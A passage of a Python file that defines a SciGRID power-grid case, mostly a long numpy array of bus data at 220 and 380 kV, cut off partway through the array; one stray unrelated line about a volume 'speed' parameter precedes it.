        - "speed=(int)" is the maximum volume jump per tick as a percentage of
<reponame>thanever/SOC from numpy import array def scigrid_2011_01_04_06(): ppc = {"version": '2'} ppc["baseMVA"] = 100.0 ppc["bus"] = array([ [586, 3, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [589, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [590, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [593, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [594, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [595, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [597, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [598, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [599, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [600, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [601, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [602, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [603, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [607, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [608, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [609, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [610, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [611, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [612, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [613, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [614, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [616, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [617, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [618, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [619, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [621, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [623, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [624, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [628, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [629, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [631, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [632, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [637, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [638, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [639, 2, 0, 0, 0, 0, 
0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [640, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [641, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [642, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [643, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [646, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [647, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [650, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [652, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [655, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [657, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [658, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [661, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [662, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [663, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [666, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [668, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [670, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [672, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [675, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [676, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [677, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [678, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [679, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [681, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [683, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [685, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [687, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [689, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [691, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [693, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [694, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [695, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [696, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [697, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [698, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [701, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [702, 2, 0, 0, 0, 0, 
0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [704, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [705, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [707, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [708, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [711, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [713, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [714, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [716, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [717, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [719, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [721, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [722, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [723, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [724, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [725, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [727, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [728, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [730, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [731, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [732, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [733, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [735, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [737, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [738, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [739, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [741, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [742, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [743, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [745, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [746, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [747, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [748, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [749, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [750, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [753, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [758, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [760, 2, 0, 0, 0, 0, 
0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [761, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [762, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [763, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [765, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [767, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [769, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [771, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [772, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [774, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [776, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [777, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [778, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [781, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [784, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [785, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [787, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [788, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [789, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [790, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [791, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [792, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [793, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [794, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [795, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [796, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [798, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [800, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [801, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [802, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [805, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [806, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [808, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [809, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [811, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [814, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [815, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [816, 2, 0, 0, 0, 0, 
0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [817, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [818, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [821, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [822, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [825, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [826, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [829, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [830, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [832, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [833, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [834, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [835, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [836, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [837, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [839, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [840, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [841, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [842, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [843, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [844, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [845, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [847, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [848, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [849, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [850, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [851, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [852, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [853, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [854, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [855, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [856, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [857, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [858, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [859, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [860, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [862, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [863, 2, 0, 0, 0, 0, 
0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [864, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [865, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [866, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [867, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [869, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [870, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [872, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [873, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [874, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [875, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [877, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [881, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [882, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [883, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [884, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [885, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [886, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [888, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [889, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [890, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [893, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [894, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [895, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [896, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [897, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [898, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [899, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [900, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [902, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [903, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [905, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [906, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [907, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [909, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [911, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [913, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [914, 2, 0, 0, 0, 0, 
0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [915, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [916, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [917, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [918, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [919, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [920, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [921, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [922, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [923, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [924, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [925, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [928, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [931, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [934, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [935, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [936, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [937, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [939, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [940, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [942, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [943, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [944, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [945, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [946, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [948, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [950, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [951, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [952, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [956, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [957, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [958, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [959, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [960, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [963, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [965, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [966, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [967, 2, 0, 0, 0, 0, 
0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [968, 2, 0, 0, 0, 0, 0, 0.999535, 0, 220.0, 0, 1.1, 0.9 ], [969, 2, 0, 0, 0, 0, 0, 0.999535, 0, 220.0, 0, 1.1, 0.9 ], [971, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [973, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [975, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [976, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [977, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [978, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [980, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [981, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [982, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [983, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [984, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [985, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [986, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [987, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [988, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [990, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [993, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [994, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [995, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [996, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [997, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [998, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [999, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1000, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1002, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1003, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1006, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1007, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1008, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1010, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1011, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1012, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1014, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1018, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], 
[1019, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1023, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1025, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1026, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1027, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1028, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1029, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1030, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1031, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1032, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1033, 2, 0, 0, 0, 